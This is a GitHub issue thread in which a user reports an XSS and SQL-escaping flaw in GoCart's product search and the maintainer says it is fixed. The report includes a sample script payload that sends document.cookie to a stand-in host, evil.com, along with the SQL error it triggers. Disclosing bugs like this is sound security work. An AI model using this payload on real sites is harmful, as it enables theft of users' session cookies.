### ISSUE TITLE
XSS Vulnerability

### ISSUE THREAD

**Issue by olimortimer** [gocart/GoCart3#45]
It's come to light that the search functionality in both GoCart 2 and GoCart 3 is susceptible to XSS, or at least it doesn't handle the inserted code, so an SQL error is thrown, showing the query that was run.

For instance, search for the below on a GoCart install:

```
<script>document.InnerHTML += "<img src='http://evil.com/?cookie="+document.cookie+" />";</script>
```

And the following error is displayed back:

```
Error Number: 1064

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '`+` = `\"\";[removed]%"` OR `op_description LIKE' at line 4

SELECT COUNT(*) AS `numrows` FROM `op_products` WHERE `enabled_1` = 1 AND (`op_name LIKE "%[removed]document`.`InnerHTML` `+` = `\"\";[removed]%"` OR `op_description LIKE "%[removed]document`.`InnerHTML` `+` = `\"\";[removed]%"` OR `op_excerpt LIKE "%[removed]document`.`InnerHTML` `+` = `\"\";[removed]%"` OR `op_sku LIKE "%[removed]document`.`InnerHTML` `+` = `\"\";[removed]%"`)

Filename: modules/products/models/Products.php

Line Number: 327
```

**Comment by gocart** [comment]
Could be a bug in CodeIgniter's Active Record implementation. I'll take a look and see if I can come up with a solution.

**Comment by gocart** [comment]
This wasn't so much an XSS vulnerability as it was a flawed query / escaping that lead to a malformed mysql query. It has been fixed with pull request 78a4316
